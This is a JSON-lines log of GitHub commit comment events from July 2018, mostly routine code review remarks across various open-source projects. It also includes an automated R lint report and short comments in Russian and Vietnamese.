{"id":"8022885208","type":"CommitCommentEvent","actor":{"login":"Shelnutt2"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29844265,"position":11,"line":507,"path":"tiledb/sm/cpp_api/array_schema.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T13:56:34Z","updated_at":"2018-07-26T13:56:34Z","author_association":"COLLABORATOR","body":"The reason was to initially avoid touching existing code/classes/functions as much as possible. This was recommended to keep the rebasing/merging easier but I don't believe that will be a large issue since this is isolated functionality. Moving it into the ArraySchema class makes sense and easily doable."}},"created_at":"2018-07-26T13:56:34Z"}
{"id":"8022888290","type":"CommitCommentEvent","actor":{"login":"mati865"},"repo":{"name":"Alexpux/MINGW-packages"},"payload":{"comment":{"id":29844268,"position":28,"line":28,"path":"mingw-w64-curl/0003-libpsl-static-libs.patch","commit_id":"9dd09604791ad5152cb4c6dd409c85a980c06b18","created_at":"2018-07-26T13:57:03Z","updated_at":"2018-07-26T13:57:03Z","author_association":"CONTRIBUTOR","body":"`s/nghttp2/psl`?"}},"created_at":"2018-07-26T13:57:03Z"}
{"id":"8022901235","type":"CommitCommentEvent","actor":{"login":"Jay-Jay-OPL"},"repo":{"name":"Jay-Jay-OPL/OPL-Daily-Builds"},"payload":{"comment":{"id":29844283,"position":null,"line":null,"path":null,"commit_id":"16e56f41900992eb5b6a65fc522528961e636038","created_at":"2018-07-26T13:59:03Z","updated_at":"2018-07-26T13:59:03Z","author_association":"OWNER","body":"Thanks for the suggestion...\r\n\r\nI think I tried this a long time ago, but couldn't figure out how to merge the conflicts.  Since many of the files between the two repos have changes.  But this was way back when we were with BITBUCKET.\r\n\r\nI'll give it a whirl again, since I have a better grasp on GIT than before.  At least I know what all these markers mean:  `<<<<<<<, =======, and >>>>>>>` in the files that have conflicts.\r\n\r\nI recall the first time I did this, and noticed that all my files had all these changes to them.  I panicked and said, _Hell no!  I ain't doing that again!_ :rofl: \r\n\r\nWhat I may end up doing (and please advise me if you think it won't help?) but I was thinking of making my changes into a branch, this way I leave the master untouched and simply work on my branch whenever I make my changes and share that at PS2-HOME\r\n\r\nI just don't know at this moment how I can then merge the changes from the master to my branch, and also keep what I want, perhaps I may end up again with the same situation with merge conflicts.\r\n\r\nI'm still using the msys cmd prompt, I've never ventured it trying the windows based GUI.  "}},"created_at":"2018-07-26T13:59:03Z"}
{"id":"8022905348","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29844291,"position":null,"line":null,"path":null,"commit_id":"ce93eb3c5177737ee844da6f1064110ba04862ec","created_at":"2018-07-26T13:59:42Z","updated_at":"2018-07-26T13:59:42Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/ce93eb3c5177737ee844da6f1064110ba04862ec/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-26T13:59:42Z"}
{"id":"8022913322","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29844312,"position":11,"line":507,"path":"tiledb/sm/cpp_api/array_schema.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T14:00:56Z","updated_at":"2018-07-26T14:00:56Z","author_association":"CONTRIBUTOR","body":"Yeah, IMO the core TileDB code should not be using API functions from `tiledb.h`, but the other way around."}},"created_at":"2018-07-26T14:00:56Z"}
{"id":"8022915144","type":"CommitCommentEvent","actor":{"login":"ztalbot2000"},"repo":{"name":"ztalbot2000/homebridge-cmd4"},"payload":{"comment":{"id":29844343,"position":null,"line":null,"path":null,"commit_id":"aed46f3eae93b1a1cbf7daf9cebe967db0853a9c","created_at":"2018-07-26T14:01:13Z","updated_at":"2018-07-26T14:01:13Z","author_association":"OWNER","body":"This resolves an issue found with node v10.6.0 and ERR_INVALID_CALLBACK"}},"created_at":"2018-07-26T14:01:13Z"}
{"id":"8022915522","type":"CommitCommentEvent","actor":{"login":"hexmode"},"repo":{"name":"MWStake/mediawiki-extensions-LDAPGroups"},"payload":{"comment":{"id":29844358,"position":null,"line":null,"path":null,"commit_id":"ec1e9eb78e378534c57cdca65a9a7d097cc66fa9","created_at":"2018-07-26T14:01:17Z","updated_at":"2018-07-26T14:01:17Z","author_association":"MEMBER","body":"You are hard-coding \"memberof\" when other methods are used for resolving group membership.  See the footnote on [ldap-demo's readme](https://github.com/MWStake/ldap-demo/blob/master/README.org):\r\n See [GroupOfUniqueNames vs groupOfNames ](https://ldapwiki.com/wiki/GroupOfUniqueNames%20vs%20groupOfNames) and [memberOf](https://ldapwiki.com/wiki/memberOf) for information on different ways directory servers manage groups.\r\n\r\nI have not implemented memberof, yet, but since it is (probably) what most people are interested in, it should be done.  And this should be documented better (or, at all).\r\n\r\nSee this [commit against LDAPProvider](https://github.com/MWStake/mediawiki-extensions-LDAPProvider/commit/541e5b6dccfa0ff46bb96507329674bb27d76cbb) for the current implementation of group resolution."}},"created_at":"2018-07-26T14:01:17Z"}
{"id":"8022920675","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844437,"position":48,"line":20,"path":"src/parse.c","commit_id":"ced8733453f9595ca6b876728fb540911b405f9b","created_at":"2018-07-26T14:02:05Z","updated_at":"2018-07-26T14:02:05Z","author_association":"CONTRIBUTOR","body":"After the email discussion can we agree to put that on the internal.h? Or maybe a macro on internal.h?"}},"created_at":"2018-07-26T14:02:05Z"}
{"id":"8022921449","type":"CommitCommentEvent","actor":{"login":"leebaird"},"repo":{"name":"leebaird/discover"},"payload":{"comment":{"id":29844441,"position":null,"line":null,"path":null,"commit_id":"1581ae4005f9e5a0882f2f7c1836b84cf6dc2ff9","created_at":"2018-07-26T14:02:13Z","updated_at":"2018-07-26T14:02:13Z","author_association":"OWNER","body":"Thanks for catching my mistakes on the new color variables.\r\nAlso good catch on the curl and rm."}},"created_at":"2018-07-26T14:02:13Z"}
{"id":"8022923395","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29844445,"position":7,"line":7,"path":"Lesson_2/vowels.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T14:02:32Z","updated_at":"2018-07-26T14:02:32Z","author_association":"NONE","body":"добавление значений в хеш с помощью `merge` или `merge!` нужно использовать аккуратно\r\n\r\nпредпочтительней добавление в хеш значения и ключа вот таким способом:\r\n```ruby\r\nsome_hash[key] = value\r\n```\r\nрезультат будет тот же, что при мердже, но читается проще и почти всегда оптимальней по ресурсам"}},"created_at":"2018-07-26T14:02:32Z"}
{"id":"8022924869","type":"CommitCommentEvent","actor":{"login":"cnuke"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29844446,"position":null,"line":null,"path":null,"commit_id":"05735d5772c3da72ec371f056d1d4da04003de04","created_at":"2018-07-26T14:02:46Z","updated_at":"2018-07-26T14:02:46Z","author_association":"NONE","body":"@alex-ab done."}},"created_at":"2018-07-26T14:02:46Z"}
{"id":"8022925036","type":"CommitCommentEvent","actor":{"login":"MichaelAquilina"},"repo":{"name":"MichaelAquilina/Document-Classification"},"payload":{"comment":{"id":29844448,"position":null,"line":null,"path":null,"commit_id":"7ddc93f2d9672fcee1e3530ecf38f38392f467f3","created_at":"2018-07-26T14:02:48Z","updated_at":"2018-07-26T14:02:48Z","author_association":"OWNER","body":"I'm afraid this project is very old (I did this in my undergraduate years for a course) so I dont have the original documents.\r\n\r\nIt should work with *any* sgml documents you provide it."}},"created_at":"2018-07-26T14:02:48Z"}
{"id":"8022926631","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844456,"position":1,"line":1,"path":"src/help_functions.c","commit_id":"b408cccdda5a5c29981f4791b71c2dcc2c8959c6","created_at":"2018-07-26T14:03:04Z","updated_at":"2018-07-26T14:03:04Z","author_association":"CONTRIBUTOR","body":"Yes. This could be a better name"}},"created_at":"2018-07-26T14:03:04Z"}
{"id":"8022930310","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844460,"position":48,"line":20,"path":"src/parse.c","commit_id":"ced8733453f9595ca6b876728fb540911b405f9b","created_at":"2018-07-26T14:03:42Z","updated_at":"2018-07-26T14:03:42Z","author_association":"MEMBER","body":"Mmm.. the macro was referring to implementing as OTRv3. If we are using the internal.h approach, then is only exposing the functions. "}},"created_at":"2018-07-26T14:03:42Z"}
{"id":"8022931214","type":"CommitCommentEvent","actor":{"login":"wsolichin-bto"},"repo":{"name":"BeTomorrowUK/Firmware"},"payload":{"comment":{"id":29844463,"position":null,"line":null,"path":null,"commit_id":"a8f185e9eda95bbf14513d5841694e8a9b681e16","created_at":"2018-07-26T14:03:51Z","updated_at":"2018-07-26T14:03:51Z","author_association":"NONE","body":"DJI F550 Black Parameters, fly stable with good response for approximately 5 minutes. Modification set: Calibrated Battery Parameters, increased MC_YAWRAUTO_MAX to 12.0, decreased MPC_TILTMAX_AIR to 7.5. "}},"created_at":"2018-07-26T14:03:51Z"}
{"id":"8022933454","type":"CommitCommentEvent","actor":{"login":"ryancyq"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":29844473,"position":16,"line":16,"path":"src/Abp.AspNetCore/Json/AbpMvcContractResolver.cs","commit_id":"8bd479e3fb62db8f700ff138577be3d3e69d316d","created_at":"2018-07-26T14:04:13Z","updated_at":"2018-07-26T14:04:13Z","author_association":"CONTRIBUTOR","body":"hi @maliming , I believe it was left out previously.\r\n\r\nI thought of adding a flag into `AspNetCoreConfiguration` and read the flag to determine if `_dateTimeFormat` should be overridden."}},"created_at":"2018-07-26T14:04:13Z"}
{"id":"8022934321","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844474,"position":1,"line":1,"path":"src/readotr.c","commit_id":"9e14fe38b4717d71560e99dc74bea9b877f14f7d","created_at":"2018-07-26T14:04:21Z","updated_at":"2018-07-26T14:04:21Z","author_association":"CONTRIBUTOR","body":"We pretend to do that, but to make it work faster we copied and changed the way we want to make it work. "}},"created_at":"2018-07-26T14:04:21Z"}
{"id":"8022939261","type":"CommitCommentEvent","actor":{"login":"peiguangda"},"repo":{"name":"framgia/rails_timeline_event_management_01"},"payload":{"comment":{"id":29844486,"position":8,"line":6,"path":"vendor/assets/javascripts/noti.js","commit_id":"a6dde05070c52543b49aea187530238114740551","created_at":"2018-07-26T14:05:10Z","updated_at":"2018-07-26T14:05:10Z","author_association":"NONE","body":"xóa cmt"}},"created_at":"2018-07-26T14:05:10Z"}
{"id":"8022940516","type":"CommitCommentEvent","actor":{"login":"peiguangda"},"repo":{"name":"framgia/rails_timeline_event_management_01"},"payload":{"comment":{"id":29844492,"position":16,"line":19,"path":"vendor/assets/javascripts/noti.js","commit_id":"a6dde05070c52543b49aea187530238114740551","created_at":"2018-07-26T14:05:21Z","updated_at":"2018-07-26T14:05:21Z","author_association":"NONE","body":"xóa cmt"}},"created_at":"2018-07-26T14:05:21Z"}
{"id":"8022942215","type":"CommitCommentEvent","actor":{"login":"AdelaHaoyuYe"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29844498,"position":38,"line":453,"path":"src/main/java/housing/Household.java","commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-26T14:05:36Z","updated_at":"2018-07-26T14:05:36Z","author_association":"OWNER","body":"Yes this is not needed. I added it to test one of the warnings. I will delete it."}},"created_at":"2018-07-26T14:05:36Z"}
{"id":"8022942464","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844500,"position":15,"line":27,"path":"src/otrng_parse.c","commit_id":"dde5316e0930b265dce21435c7b98245b121dc1f","created_at":"2018-07-26T14:05:38Z","updated_at":"2018-07-26T14:05:38Z","author_association":"CONTRIBUTOR","body":"Yes it's contains, but we thought it will be better to show just like it is displayed on responser->to_display"}},"created_at":"2018-07-26T14:05:38Z"}
{"id":"8022943820","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29844507,"position":null,"line":null,"path":null,"commit_id":"6bcbad8fcfa4a8bba373d701b82a9bf64eca5594","created_at":"2018-07-26T14:05:52Z","updated_at":"2018-07-26T14:05:52Z","author_association":"CONTRIBUTOR","body":"It seems that github.com/aead/chacha20 needs go versions >= 1.8.7, but travis still use go1.7 which make CI fails."}},"created_at":"2018-07-26T14:05:52Z"}
{"id":"8022944563","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29844513,"position":20,"line":14,"path":"1/quadratic_equation.rb","commit_id":"cf19dbc0d2a4cc3b13c65f6271543e2a9e3913ba","created_at":"2018-07-26T14:05:59Z","updated_at":"2018-07-26T14:05:59Z","author_association":"NONE","body":"Тут вычисление квадратного корня можно вынести в отдельную переменную, и переиспользовать ее в вычислениях позже. В случаях с более сложными вычислениями, это сэкономит ресурсы."}},"created_at":"2018-07-26T14:05:59Z"}
{"id":"8022946168","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29844516,"position":null,"line":null,"path":null,"commit_id":"69b0107ae13ea8ad03307f4884c5f935bccd9e92","created_at":"2018-07-26T14:06:15Z","updated_at":"2018-07-26T14:06:15Z","author_association":"NONE","body":"This is the wrong direction. You have to use `shift<Up>(pos.pieces()))` because here opponents pawns are considered. Par example say we are white (=Us). At e5 a black pawn exists. we have a knight at e4. So we have to shift the knight Up=(North) to see it blocks the black pawn on e5."}},"created_at":"2018-07-26T14:06:15Z"}
{"id":"8022946233","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29844517,"position":27,"line":20,"path":"1/quadratic_equation.rb","commit_id":"cf19dbc0d2a4cc3b13c65f6271543e2a9e3913ba","created_at":"2018-07-26T14:06:16Z","updated_at":"2018-07-26T14:06:16Z","author_association":"NONE","body":"тут и выше индентацию хорошо бы поправить."}},"created_at":"2018-07-26T14:06:16Z"}
{"id":"8022952649","type":"CommitCommentEvent","actor":{"login":"Seldaek"},"repo":{"name":"Martimiz/silverstripe-translatablegooglesitemaps"},"payload":{"comment":{"id":29844525,"position":null,"line":null,"path":null,"commit_id":"c2e65266792b1e4eac750faf8528b8f44f5c60c9","created_at":"2018-07-26T14:07:18Z","updated_at":"2018-07-26T14:07:18Z","author_association":"NONE","body":"This commit broke the file, there's a duplicate `\"license\":` there."}},"created_at":"2018-07-26T14:07:18Z"}
{"id":"8022954217","type":"CommitCommentEvent","actor":{"login":"Seldaek"},"repo":{"name":"Martimiz/silverstripe-translatablegooglesitemaps"},"payload":{"comment":{"id":29844526,"position":null,"line":null,"path":null,"commit_id":"c2e65266792b1e4eac750faf8528b8f44f5c60c9","created_at":"2018-07-26T14:07:33Z","updated_at":"2018-07-26T14:07:33Z","author_association":"NONE","body":"@Martimiz please fix the composer.json so the package stops failing to update on packagist"}},"created_at":"2018-07-26T14:07:33Z"}
{"id":"8022954727","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844528,"position":11,"line":13,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-26T14:07:37Z","updated_at":"2018-07-26T14:07:37Z","author_association":"CONTRIBUTOR","body":"We firstly copied before expose inside the libotrng. It will be done soon."}},"created_at":"2018-07-26T14:07:37Z"}
